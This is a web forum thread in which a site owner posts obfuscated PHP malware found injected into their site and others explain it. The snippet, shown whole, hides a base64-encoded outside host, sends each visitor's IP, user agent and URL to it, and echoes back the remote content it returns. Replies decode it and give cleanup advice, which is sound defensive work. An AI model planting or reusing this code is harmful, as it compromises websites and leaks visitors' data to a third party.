  1. #1
    SitePoint Addict

    Unknown possible malicious code

    Hi,

    I checked one of my websites recently and found the following code, and I have no idea how it was placed there or what it does. If you have an idea what it does, could you please tell me?

    PHP Code:
    <?php
    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1;

        // This code use for global bot statistic

        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

        $stCurlHandle = NULL;

        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
                $stCurlLink = base64_decode('aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @$stCurlHandle = curl_init( $stCurlLink );
            }
        }
        if ( $stCurlHandle !== NULL )
        {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
            $sResult = @curl_exec($stCurlHandle);
            if ( $sResult[0]=="O" )
            {
                $sResult[0]=" ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    ?>

  2. #2
    SitePoint Enthusiast
    It sends statistics to http://browserglobalstat.com/statD/stat.php
    The URL comes from the base64 decode.

  3. #3
    SitePoint Wizard
    Any time you see obfuscated code or base64_decode or any other function to handle obfuscated code in PHP or JavaScript, that is a sign that something is not right. Legitimate coders don't try to hide what they are doing. A search for browserglobalstat.com reveals that another person on another board complained about his code being modified similarly to what happened to you. How access was gained to your account is anyone's guess.

    Definitely remove the offending code, or better yet, restore all of your files from backups you know are clean and change all your passwords, including your hosting control panel and FTP passwords. And make sure your file permissions are set properly as recommended by your web host. Hackers like to put in back doors so they can get into your account again if the main exploit is found. If you are using any open source scripts, make sure they are updated to the latest version.

  4. #4
    SitePoint Addict
    Quote Originally Posted by Frenz48:
    It sends statistics to http://browserglobalstat.com/statD/stat.php
    The URL comes from the base64 decode.
    Thanks for the info.

    Quote Originally Posted by cheesedude:
    Any time you see obfuscated code or base64_decode or any other function to handle obfuscated code in PHP or JavaScript, that is a sign that something is not right. Legitimate coders don't try to hide what they are doing. A search for browserglobalstat.com reveals that another person on another board complained about his code being modified similarly to what happened to you. How access was gained to your account is anyone's guess.

    Definitely remove the offending code, or better yet, restore all of your files from backups you know are clean and change all your passwords, including your hosting control panel and FTP passwords. And make sure your file permissions are set properly as recommended by your web host. Hackers like to put in back doors so they can get into your account again if the main exploit is found. If you are using any open source scripts, make sure they are updated to the latest version.
    Thanks a lot for the suggestions. I have no idea how this code was inserted there, but whether it was done manually or by a script, it was inserted in the wrong place, so the page gave an error. That's how I spotted it.
